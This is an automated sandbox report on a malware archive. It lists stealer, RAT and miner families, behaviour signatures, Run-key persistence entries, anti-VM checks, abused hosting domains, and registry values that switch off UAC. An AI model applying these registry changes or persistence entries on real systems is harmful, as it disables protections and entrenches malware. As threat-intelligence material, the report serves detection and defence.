Analysis Overview
SHA256
cf99eaaa334a9c8ffc2fe0e1068ffcc02dda1dd8b2b0eab2821182c5d2c1f51d
Threat Level: Known bad
The file 241127-xqsswsslej_pw_infected.zip was found to be: Known bad.
Malicious Activity Summary
Redline family
Suspicious use of NtCreateProcessExOtherParentProcess
Lumma Stealer, LummaC
Exelastealer family
Suspicious use of NtCreateUserProcessOtherParentProcess
Umbral
Phorphiex family
Discordrat family
Stealc
Contains code to disable Windows Defender
Xworm family
Detect Vidar Stealer
Quasar RAT
Asyncrat family
Discord RAT
AsyncRat
Quasar family
Njrat family
Mimikatz
xmrig
Gurcu, WhiteSnake
Cryptbot family
RedLine
UAC bypass
Stealc family
Lumma family
Detect Xworm Payload
Vidar
Gurcu family
njRAT/Bladabindi
ZharkBot
Exela Stealer
Quasar payload
Vidar family
Phorphiex payload
Detect Umbral payload
Xworm
Detects ZharkBot payload
44Caliber family
Phorphiex, Phorpiex
CryptBot
Umbral family
RedLine payload
Zharkbot family
Mimikatz family
44Caliber
Xmrig family
Grants admin privileges
XMRig Miner payload
Enumerates VirtualBox registry keys
Identifies VirtualBox via ACPI registry values (likely anti-VM)
mimikatz is an open source tool to dump credentials on Windows
Async RAT payload
Command and Scripting Interpreter: PowerShell
Creates new service(s)
Adds policy Run key to start application
Stops running service(s)
Modifies Windows Firewall
Downloads MZ/PE file
Drops file in Drivers directory
Command and Scripting Interpreter: PowerShell
Blocklisted process makes network request
Sets file to hidden
Command and Scripting Interpreter: PowerShell
Event Triggered Execution: Image File Execution Options Injection
Checks computer location settings
Indicator Removal: Clear Windows Event Logs
Loads dropped DLL
Checks BIOS information in registry
Reads data files stored by FTP clients
Event Triggered Execution: Component Object Model Hijacking
VMProtect packed file
Executes dropped EXE
Reads user/profile data of web browsers
Identifies Wine through registry keys
Drops startup file
Unsecured Credentials: Credentials In Files
Themida packer
Clipboard Data
Power Settings
Accesses cryptocurrency files/wallets, possible credential harvesting
Legitimate hosting services abused for malware hosting/C2
Network Service Discovery
Checks installed software on the system
Checks whether UAC is enabled
Indicator Removal: File Deletion
Looks up external IP address via web service
Adds Run key to start application
UPX packed file
Drops file in System32 directory
Hide Artifacts: Hidden Files and Directories
Suspicious use of NtSetInformationThreadHideFromDebugger
AutoIT Executable
Enumerates processes with tasklist
Suspicious use of SetThreadContext
Launches sc.exe
Drops file in Windows directory
Drops file in Program Files directory
Event Triggered Execution: Installer Packages
Detects Pyinstaller
Enumerates physical storage devices
System Network Configuration Discovery: Internet Connection Discovery
System Location Discovery: System Language Discovery
Permission Groups Discovery: Local Groups
Program crash
System Network Configuration Discovery: Wi-Fi Discovery
Browser Information Discovery
Access Token Manipulation: Create Process with Token
Unsigned PE
NSIS installer
Runs .reg file with regedit
Suspicious use of WriteProcessMemory
Runs ping.exe
Views/modifies file attributes
Script User-Agent
Suspicious use of AdjustPrivilegeToken
Modifies data under HKEY_USERS
Suspicious use of SendNotifyMessage
Collects information from the system
Kills process with taskkill
Checks SCSI registry key(s)
Suspicious behavior: EnumeratesProcesses
Suspicious use of UnmapMainImage
Uses Task Scheduler COM API
Suspicious behavior: AddClipboardFormatListener
Modifies registry class
Gathers system information
Checks processor information in registry
Detects videocard installed
Suspicious behavior: MapViewOfSection
Suspicious use of FindShellTrayWindow
Suspicious use of SetWindowsHookEx
Runs net.exe
Suspicious behavior: GetForegroundWindowSpam
Enumerates system info in registry
Scheduled Task/Job: Scheduled Task
Delays execution with timeout.exe
Suspicious behavior: NtCreateUserProcessBlockNonMicrosoftBinary
GoLang User-Agent
Modifies registry key
MITRE ATT&CK
Analysis: static1
Detonation Overview
Reported
2024-12-12 18:02
Signatures
Unsigned PE
| Description | Indicator | Process | Target |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
Analysis: behavioral1
Detonation Overview
Submitted
2024-12-12 18:02
Reported
2024-12-12 18:22
Platform
win10v2004-20241007-en
Max time kernel
838s
Max time network
1201s
Command Line
Signatures
AsyncRat
Asyncrat family
CryptBot
Cryptbot family
Detect Vidar Stealer
| Description | Indicator | Process | Target |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
Detect Xworm Payload
| Description | Indicator | Process | Target |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
Detects ZharkBot payload
| Description | Indicator | Process | Target |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
Discord RAT
Discordrat family
Exela Stealer
Exelastealer family
Gurcu family
Gurcu, WhiteSnake
Mimikatz
Mimikatz family
Njrat family
Phorphiex family
Phorphiex payload
| Description | Indicator | Process | Target |
| N/A | N/A | N/A | N/A |
Phorphiex, Phorpiex
Quasar RAT
Quasar family
Quasar payload
| Description | Indicator | Process | Target |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
RedLine
RedLine payload
| Description | Indicator | Process | Target |
| N/A | N/A | N/A | N/A |
Redline family
Suspicious use of NtCreateUserProcessOtherParentProcess
| Description | Indicator | Process | Target |
| PID 3148 created 688 | N/A | C:\Users\Admin\AppData\Local\Temp\Files\nSoft.exe | C:\Windows\system32\sihost.exe |
| PID 6352 created 3432 | N/A | C:\Users\Admin\AppData\Local\Temp\Files\Cvimelugfq.exe | C:\Windows\Explorer.EXE |
| PID 2644 created 3432 | N/A | C:\ProgramData\jmqid\ljid.exe | C:\Windows\Explorer.EXE |
| PID 2980 created 3432 | N/A | C:\Users\Admin\AppData\Local\Temp\1902930370.exe | C:\Windows\Explorer.EXE |
| PID 2980 created 3432 | N/A | C:\Users\Admin\AppData\Local\Temp\1902930370.exe | C:\Windows\Explorer.EXE |
UAC bypass
| Description | Indicator | Process | Target |
| Set value (int) | \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\ConsentPromptBehaviorAdmin = "0" | C:\Windows\system32\reg.exe | N/A |
| Set value (int) | \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\EnableLUA = "0" | C:\Windows\system32\reg.exe | N/A |
| Set value (int) | \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\PromptOnSecureDesktop = "0" | C:\Windows\system32\reg.exe | N/A |
Vidar
Vidar family
Xworm
Xworm family
ZharkBot
Zharkbot family
njRAT/Bladabindi
Async RAT payload
| Description | Indicator | Process | Target |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
Enumerates VirtualBox registry keys
| Description | Indicator | Process | Target |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Services\VBoxSF | C:\Users\Admin\AppData\Local\Temp\Files\random.exe | N/A |
Grants admin privileges
Identifies VirtualBox via ACPI registry values (likely anti-VM)
| Description | Indicator | Process | Target |
| Key opened | \REGISTRY\MACHINE\HARDWARE\ACPI\DSDT\VBOX__ | C:\Users\Admin\AppData\Local\Temp\Files\random.exe | N/A |
| Key opened | \REGISTRY\MACHINE\HARDWARE\ACPI\DSDT\VBOX__ | C:\Users\Admin\AppData\Local\Temp\Files\nSoft.exe | N/A |
| Key opened | \REGISTRY\MACHINE\HARDWARE\ACPI\DSDT\VBOX__ | C:\Users\Admin\AppData\Local\Temp\Files\4XYFk9r.exe | N/A |
| Key opened | \REGISTRY\MACHINE\HARDWARE\ACPI\DSDT\VBOX__ | C:\Users\Admin\AppData\Local\Temp\Files\ven_protected.exe | N/A |
| Key opened | \REGISTRY\MACHINE\HARDWARE\ACPI\DSDT\VBOX__ | C:\Users\Admin\AppData\Local\Temp\Files\TigerHulk3.exe | N/A |
| Key opened | \REGISTRY\MACHINE\HARDWARE\ACPI\DSDT\VBOX__ | C:\Users\Admin\AppData\Local\Temp\Files\chrome_93.exe | N/A |
mimikatz is an open source tool to dump credentials on Windows
| Description | Indicator | Process | Target |
| N/A | N/A | N/A | N/A |
Blocklisted process makes network request
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A |
| N/A | N/A | C:\Windows\system32\cmd.exe | N/A |
| N/A | N/A | C:\Windows\system32\cmd.exe | N/A |
| N/A | N/A | C:\Windows\system32\cmd.exe | N/A |
| N/A | N/A | C:\Windows\system32\cmd.exe | N/A |
| N/A | N/A | C:\Windows\system32\cmd.exe | N/A |
| N/A | N/A | C:\Windows\system32\cmd.exe | N/A |
Command and Scripting Interpreter: PowerShell
Creates new service(s)
Downloads MZ/PE file
Event Triggered Execution: Image File Execution Options Injection
| Description | Indicator | Process | Target |
| Key created | \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\GoogleUpdate.exe | C:\Program Files (x86)\Google\Temp\GUM7DAE.tmp\GoogleUpdate.exe | N/A |
| Set value (int) | \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\GoogleUpdate.exe\DisableExceptionChainValidation = "0" | C:\Program Files (x86)\Google\Temp\GUM7DAE.tmp\GoogleUpdate.exe | N/A |
Modifies Windows Firewall
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Windows\SysWOW64\netsh.exe | N/A |
Sets file to hidden
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Windows\system32\attrib.exe | N/A |
Stops running service(s)
Checks BIOS information in registry
| Description | Indicator | Process | Target |
| Key value queried | \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\VideoBiosVersion | C:\Users\Admin\AppData\Local\Temp\Files\4XYFk9r.exe | N/A |
| Key value queried | \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\SystemBiosVersion | C:\Users\Admin\AppData\Local\Temp\Files\ven_protected.exe | N/A |
| Key value queried | \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\VideoBiosVersion | C:\Users\Admin\AppData\Local\Temp\Files\ven_protected.exe | N/A |
| Key value queried | \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\SystemBiosVersion | C:\Users\Admin\AppData\Local\Temp\Files\TigerHulk3.exe | N/A |
| Key value queried | \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\SystemBiosVersion | C:\Users\Admin\AppData\Local\Temp\Files\chrome_93.exe | N/A |
| Key value queried | \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\VideoBiosVersion | C:\Users\Admin\AppData\Local\Temp\Files\chrome_93.exe | N/A |
| Key value queried | \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\VideoBiosVersion | C:\Users\Admin\AppData\Local\Temp\Files\random.exe | N/A |
| Key value queried | \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\SystemBiosVersion | C:\Users\Admin\AppData\Local\Temp\Files\nSoft.exe | N/A |
| Key value queried | \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\SystemBiosVersion | C:\Users\Admin\AppData\Local\Temp\Files\4XYFk9r.exe | N/A |
| Key value queried | \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\VideoBiosVersion | C:\Users\Admin\AppData\Local\Temp\Files\TigerHulk3.exe | N/A |
| Key value queried | \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\SystemBiosVersion | C:\Users\Admin\AppData\Local\Temp\Files\random.exe | N/A |
| Key value queried | \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\VideoBiosVersion | C:\Users\Admin\AppData\Local\Temp\Files\nSoft.exe | N/A |
Checks computer location settings
| Description | Indicator | Process | Target |
| Key value queried | \REGISTRY\USER\S-1-5-21-1045960512-3948844814-3059691613-1000\Control Panel\International\Geo\Nation | C:\Users\Admin\AppData\Local\Temp\Files\PORNHU~1.EXE | N/A |
| Key value queried | \REGISTRY\USER\S-1-5-21-1045960512-3948844814-3059691613-1000\Control Panel\International\Geo\Nation | C:\Users\Admin\AppData\Local\Temp\Files\PkContent.exe | N/A |
| Key value queried | \REGISTRY\USER\S-1-5-21-1045960512-3948844814-3059691613-1000\Control Panel\International\Geo\Nation | C:\Users\Admin\AppData\Local\Temp\4363463463464363463463463.exe | N/A |
| Key value queried | \REGISTRY\USER\S-1-5-21-1045960512-3948844814-3059691613-1000\Control Panel\International\Geo\Nation | C:\Users\Admin\AppData\Local\Temp\Files\pornhub_downloader.exe | N/A |
| Key value queried | \REGISTRY\USER\S-1-5-21-1045960512-3948844814-3059691613-1000\Control Panel\International\Geo\Nation | C:\Users\Admin\AppData\Local\Temp\Files\C1J7SVw.exe | N/A |
| Key value queried | \REGISTRY\USER\S-1-5-21-1045960512-3948844814-3059691613-1000\Control Panel\International\Geo\Nation | C:\Users\Admin\AppData\Local\Temp\Files\4XYFk9r.exe | N/A |
| Key value queried | \REGISTRY\USER\S-1-5-21-1045960512-3948844814-3059691613-1000\Control Panel\International\Geo\Nation | C:\Users\Admin\AppData\Local\Temp\3193919340.exe | N/A |
| Key value queried | \REGISTRY\USER\S-1-5-21-1045960512-3948844814-3059691613-1000\Control Panel\International\Geo\Nation | C:\Program Files (x86)\Google\Temp\GUM7DAE.tmp\GoogleUpdate.exe | N/A |
| Key value queried | \REGISTRY\USER\S-1-5-21-1045960512-3948844814-3059691613-1000\Control Panel\International\Geo\Nation | C:\Users\Admin\AppData\Roaming\SubDir\2klz.exe | N/A |
| Key value queried | \REGISTRY\USER\S-1-5-21-1045960512-3948844814-3059691613-1000\Control Panel\International\Geo\Nation | C:\Users\Admin\AppData\Local\Temp\Files\noll.exe | N/A |
| Key value queried | \REGISTRY\USER\S-1-5-21-1045960512-3948844814-3059691613-1000\Control Panel\International\Geo\Nation | C:\Users\Admin\AppData\Local\Temp\Files\OneDrive.exe | N/A |
| Key value queried | \REGISTRY\USER\S-1-5-21-1045960512-3948844814-3059691613-1000\Control Panel\International\Geo\Nation | C:\Users\Admin\AppData\Local\Temp\Files\requirements.exe | N/A |
| Key value queried | \REGISTRY\USER\S-1-5-21-1045960512-3948844814-3059691613-1000\Control Panel\International\Geo\Nation | C:\Users\Admin\AppData\Local\Temp\Files\TT18.exe | N/A |
| Key value queried | \REGISTRY\USER\S-1-5-21-1045960512-3948844814-3059691613-1000\Control Panel\International\Geo\Nation | C:\gZtXpepbYS\u6V4s1Fv.exe | N/A |
| Key value queried | \REGISTRY\USER\S-1-5-21-1045960512-3948844814-3059691613-1000\Control Panel\International\Geo\Nation | C:\Windows\system32\mshta.exe | N/A |
| Key value queried | \REGISTRY\USER\S-1-5-21-1045960512-3948844814-3059691613-1000\Control Panel\International\Geo\Nation | C:\Users\Admin\AppData\Local\Temp\Files\Discord3.exe | N/A |
Clipboard Data
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Windows\system32\cmd.exe | N/A |
| N/A | N/A | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A |
Drops startup file
| Description | Indicator | Process | Target |
| File opened for modification | C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\Steam. update.exe | C:\Users\Admin\AppData\Local\Temp\Files\Steam.Upgreyd.exe | N/A |
| File created | C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\requirements.lnk | C:\Users\Admin\AppData\Local\Temp\Files\requirements.exe | N/A |
| File opened for modification | C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\requirements.lnk | C:\Users\Admin\AppData\Local\Temp\Files\requirements.exe | N/A |
| File created | C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\windows32.lnk | C:\Users\Admin\AppData\Local\Temp\Files\XClient.exe | N/A |
| File opened for modification | C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\windows32.lnk | C:\Users\Admin\AppData\Local\Temp\Files\XClient.exe | N/A |
| File created | C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\Steam. update.exe | C:\Users\Admin\AppData\Local\Temp\Files\Steam.Upgreyd.exe | N/A |
Event Triggered Execution: Component Object Model Hijacking
Executes dropped EXE
Identifies Wine through registry keys
| Description | Indicator | Process | Target |
| Key opened | \REGISTRY\USER\S-1-5-21-1045960512-3948844814-3059691613-1000\Software\Wine | C:\Users\Admin\AppData\Local\Temp\Files\4XYFk9r.exe | N/A |
| Key opened | \REGISTRY\USER\S-1-5-21-1045960512-3948844814-3059691613-1000\Software\Wine | C:\Users\Admin\AppData\Local\Temp\Files\random.exe | N/A |
Loads dropped DLL
Reads data files stored by FTP clients
Reads user/profile data of web browsers
Themida packer
| Description | Indicator | Process | Target |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
Unsecured Credentials: Credentials In Files
VMProtect packed file
| Description | Indicator | Process | Target |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
Adds Run key to start application
| Description | Indicator | Process | Target |
| Set value (str) | \REGISTRY\USER\S-1-5-21-1045960512-3948844814-3059691613-1000\SOFTWARE\Microsoft\Windows\CurrentVersion\Run\windows32 = "C:\\Users\\Admin\\AppData\\Local\\Temp\\windows32.exe" | C:\Users\Admin\AppData\Local\Temp\Files\XClient.exe | N/A |
| Set value (str) | \REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\Windows\CurrentVersion\Run\42db17215651017a223d2108cb096394 = "\"C:\\Users\\Admin\\AppData\\Local\\Temp\\Server.exe\" .." | C:\Users\Admin\AppData\Local\Temp\Server.exe | N/A |
| Set value (str) | \REGISTRY\USER\S-1-5-21-1045960512-3948844814-3059691613-1000\SOFTWARE\Microsoft\Windows\CurrentVersion\Run\Yandex. Update = "\"C:\\Users\\Admin\\AppData\\Local\\Temp\\Files\\Steam.Upgreyd.exe\" .." | C:\Users\Admin\AppData\Local\Temp\Files\Steam.Upgreyd.exe | N/A |
| Set value (str) | \REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\Windows\CurrentVersion\Run\Yandex. Update = "\"C:\\Users\\Admin\\AppData\\Local\\Temp\\Files\\Steam.Upgreyd.exe\" .." | C:\Users\Admin\AppData\Local\Temp\Files\Steam.Upgreyd.exe | N/A |
| Set value (str) | \REGISTRY\USER\S-1-5-21-1045960512-3948844814-3059691613-1000\SOFTWARE\Microsoft\Windows\CurrentVersion\Run\requirements = "C:\\Users\\Admin\\AppData\\Local\\Temp\\requirements.exe" | C:\Users\Admin\AppData\Local\Temp\Files\requirements.exe | N/A |
| Set value (str) | \REGISTRY\USER\S-1-5-21-1045960512-3948844814-3059691613-1000\SOFTWARE\Microsoft\Windows\CurrentVersion\Run\DiagsCap = "C:\\Users\\Admin\\AppData\\Roaming\\DiagsCap.exe" | C:\Users\Admin\AppData\Local\Temp\Files\Cvimelugfq.exe | N/A |
| Set value (str) | \REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\Windows\CurrentVersion\Run\Windows Settings = "C:\\Windows\\sysnldcvmr.exe" | C:\Users\Admin\AppData\Local\Temp\481117205.exe | N/A |
| Set value (str) | \REGISTRY\USER\S-1-5-21-1045960512-3948844814-3059691613-1000\SOFTWARE\Microsoft\Windows\CurrentVersion\Run\OneDrive = "C:\\Users\\Admin\\documents\\OneDrive.exe" | C:\Users\Admin\AppData\Local\Temp\Files\OneDrive.exe | N/A |
| Set value (str) | \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\RunOnce\wextract_cleanup0 = "rundll32.exe C:\\Windows\\system32\\advpack.dll,DelNodeRunDLL32 \"C:\\Users\\Admin\\AppData\\Local\\Temp\\IXP000.TMP\\\"" | C:\Users\Admin\AppData\Local\Temp\Files\Reaper%20cfx%20Spoofer%20V2.exe | N/A |
| Set value (str) | \REGISTRY\USER\S-1-5-21-1045960512-3948844814-3059691613-1000\SOFTWARE\Microsoft\Windows\CurrentVersion\Run\42db17215651017a223d2108cb096394 = "\"C:\\Users\\Admin\\AppData\\Local\\Temp\\Server.exe\" .." | C:\Users\Admin\AppData\Local\Temp\Server.exe | N/A |
Checks installed software on the system
Checks whether UAC is enabled
| Description | Indicator | Process | Target |
| Key value queried | \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\EnableLUA | C:\Users\Admin\AppData\Local\Temp\Files\TigerHulk3.exe | N/A |
| Key value queried | \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\EnableLUA | C:\Users\Admin\AppData\Local\Temp\Files\chrome_93.exe | N/A |
| Key value queried | \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\EnableLUA | C:\Users\Admin\AppData\Local\Temp\Files\nSoft.exe | N/A |
| Key value queried | \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\EnableLUA | C:\Users\Admin\AppData\Local\Temp\Files\ven_protected.exe | N/A |
Legitimate hosting services abused for malware hosting/C2
| Description | Indicator | Process | Target |
| N/A | raw.githubusercontent.com | N/A | N/A |
| N/A | 2.tcp.ngrok.io | N/A | N/A |
| N/A | 2.tcp.ngrok.io | N/A | N/A |
| N/A | bitbucket.org | N/A | N/A |
| N/A | 2.tcp.ngrok.io | N/A | N/A |
| N/A | raw.githubusercontent.com | N/A | N/A |
| N/A | 2.tcp.ngrok.io | N/A | N/A |
| N/A | 2.tcp.ngrok.io | N/A | N/A |
| N/A | 2.tcp.ngrok.io | N/A | N/A |
| N/A | raw.githubusercontent.com | N/A | N/A |
| N/A | 2.tcp.ngrok.io | N/A | N/A |
| N/A | raw.githubusercontent.com | N/A | N/A |
| N/A | raw.githubusercontent.com | N/A | N/A |
| N/A | discord.com | N/A | N/A |
| N/A | bitbucket.org | N/A | N/A |
| N/A | 2.tcp.ngrok.io | N/A | N/A |
| N/A | pastebin.com | N/A | N/A |
| N/A | pastebin.com | N/A | N/A |
| N/A | pastebin.com | N/A | N/A |
| N/A | raw.githubusercontent.com | N/A | N/A |
| N/A | raw.githubusercontent.com | N/A | N/A |
| N/A | 2.tcp.ngrok.io | N/A | N/A |
| N/A | 2.tcp.ngrok.io | N/A | N/A |
| N/A | 2.tcp.ngrok.io | N/A | N/A |
| N/A | 2.tcp.ngrok.io | N/A | N/A |
| N/A | pastebin.com | N/A | N/A |
| N/A | pastebin.com | N/A | N/A |
| N/A | bitbucket.org | N/A | N/A |
| N/A | bitbucket.org | N/A | N/A |
| N/A | 2.tcp.ngrok.io | N/A | N/A |
| N/A | 2.tcp.ngrok.io | N/A | N/A |
| N/A | raw.githubusercontent.com | N/A | N/A |
| N/A | discord.com | N/A | N/A |
| N/A | raw.githubusercontent.com | N/A | N/A |
| N/A | 2.tcp.ngrok.io | N/A | N/A |
| N/A | 2.tcp.ngrok.io | N/A | N/A |
Looks up external IP address via web service
| Description | Indicator | Process | Target |
| N/A | ip-api.com | N/A | N/A |
| N/A | ip-api.com | N/A | N/A |
Network Service Discovery
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Windows\system32\cmd.exe | N/A |
Power Settings
Drops file in System32 directory
| Description | Indicator | Process | Target |
| File created | C:\Windows\system32\config\systemprofile\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive | C:\Windows\system32\WindowsPowerShell\v1.0\powershell.exe | N/A |
| File opened for modification | C:\Windows\system32\MRT.exe | C:\ProgramData\hsbpaqlrqhmp\rzyyvjydedax.exe | N/A |
| File opened for modification | C:\Windows\system32\config\systemprofile\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive | C:\Windows\system32\WindowsPowerShell\v1.0\powershell.exe | N/A |
| File opened for modification | C:\Windows\system32\MRT.exe | C:\ProgramData\hsbpaqlrqhmp\rzyyvjydedax.exe | N/A |
| File created | C:\Windows\system32\config\systemprofile\AppData\Local\Microsoft\CLR_v4.0\UsageLogs\powershell.exe.log | C:\Windows\system32\WindowsPowerShell\v1.0\powershell.exe | N/A |
| File opened for modification | C:\Windows\system32\config\systemprofile\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A |
| File opened for modification | C:\Windows\system32\MRT.exe | C:\Users\Admin\AppData\Local\Temp\Files\Office2024.exe | N/A |
| File opened for modification | C:\Windows\system32\config\systemprofile\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A |
| File opened for modification | C:\Windows\system32\config\systemprofile\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive | C:\Windows\system32\WindowsPowerShell\v1.0\powershell.exe | N/A |
| File opened for modification | C:\Windows\system32\MRT.exe | C:\ProgramData\hsbpaqlrqhmp\rzyyvjydedax.exe | N/A |
| File opened for modification | C:\Windows\system32\config\systemprofile\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive | C:\Windows\system32\WindowsPowerShell\v1.0\powershell.exe | N/A |
| File opened for modification | C:\Windows\system32\config\systemprofile\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A |
| File opened for modification | C:\Windows\system32\config\systemprofile\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A |
| File opened for modification | C:\Windows\system32\MRT.exe | C:\ProgramData\hsbpaqlrqhmp\rzyyvjydedax.exe | N/A |
Enumerates processes with tasklist
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Windows\system32\tasklist.exe | N/A |
| N/A | N/A | C:\Windows\system32\tasklist.exe | N/A |
| N/A | N/A | C:\Windows\system32\tasklist.exe | N/A |
Hide Artifacts: Hidden Files and Directories
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Windows\system32\cmd.exe | N/A |
Suspicious use of NtSetInformationThreadHideFromDebugger
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Users\Admin\AppData\Local\Temp\Files\random.exe | N/A |
| N/A | N/A | C:\Users\Admin\AppData\Local\Temp\Files\nSoft.exe | N/A |
| N/A | N/A | C:\Users\Admin\AppData\Local\Temp\Files\4XYFk9r.exe | N/A |
| N/A | N/A | C:\Users\Admin\AppData\Local\Temp\Files\%E8%88%9E%E8%B9%88%E5%8A%A9%E6%89%8B.exe | N/A |
| N/A | N/A | C:\Users\Admin\AppData\Local\Temp\Files\ven_protected.exe | N/A |
| N/A | N/A | C:\Users\Admin\AppData\Local\Temp\Files\TigerHulk3.exe | N/A |
| N/A | N/A | C:\Users\Admin\AppData\Local\Temp\Files\chrome_93.exe | N/A |
Suspicious use of SetThreadContext
UPX packed file
| Description | Indicator | Process | Target |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
Drops file in Program Files directory
| Description | Indicator | Process | Target |
| File created | C:\Program Files (x86)\Google\Temp\GUM7DAE.tmp\goopdateres_sl.dll | C:\Users\Admin\AppData\Local\Temp\Files\ChromeSetup.exe | N/A |
| File created | C:\Program Files (x86)\Google\Update\1.3.36.352\goopdateres_ca.dll | C:\Program Files (x86)\Google\Temp\GUM7DAE.tmp\GoogleUpdate.exe | N/A |
| File created | C:\Program Files (x86)\Google\Update\1.3.36.352\goopdateres_hr.dll | C:\Program Files (x86)\Google\Temp\GUM7DAE.tmp\GoogleUpdate.exe | N/A |
| File created | C:\Program Files (x86)\Google\Update\Install\{4CDF4152-5A6E-4976-A69E-F9F5F6F3D666}\CR_9552F.tmp\SETUP.EX_ | C:\Program Files (x86)\Google\Update\Install\{4CDF4152-5A6E-4976-A69E-F9F5F6F3D666}\131.0.6778.140_chrome_installer.exe | N/A |
| File created | C:\Program Files (x86)\Google\Temp\GUM7DAE.tmp\goopdateres_cs.dll | C:\Users\Admin\AppData\Local\Temp\Files\ChromeSetup.exe | N/A |
| File created | C:\Program Files (x86)\Google\Temp\GUM7DAE.tmp\goopdateres_da.dll | C:\Users\Admin\AppData\Local\Temp\Files\ChromeSetup.exe | N/A |
| File created | C:\Program Files (x86)\Google\Temp\GUM7DAE.tmp\goopdateres_sk.dll | C:\Users\Admin\AppData\Local\Temp\Files\ChromeSetup.exe | N/A |
| File created | C:\Program Files (x86)\Google\Temp\5f01f945-471f-4eb3-94e4-295351ee3240.dmp | C:\Program Files (x86)\Google\Update\GoogleUpdate.exe | N/A |
| File created | C:\Program Files (x86)\Google\Temp\GUM7DAE.tmp\GoogleUpdateComRegisterShell64.exe | C:\Users\Admin\AppData\Local\Temp\Files\ChromeSetup.exe | N/A |
| File created | C:\Program Files (x86)\Google\Temp\GUM7DAE.tmp\goopdateres_kn.dll | C:\Users\Admin\AppData\Local\Temp\Files\ChromeSetup.exe | N/A |
| File created | C:\Program Files (x86)\Google\Update\1.3.36.352\goopdateres_gu.dll | C:\Program Files (x86)\Google\Temp\GUM7DAE.tmp\GoogleUpdate.exe | N/A |
| File created | C:\Program Files (x86)\Google\Update\1.3.36.352\goopdateres_ms.dll | C:\Program Files (x86)\Google\Temp\GUM7DAE.tmp\GoogleUpdate.exe | N/A |
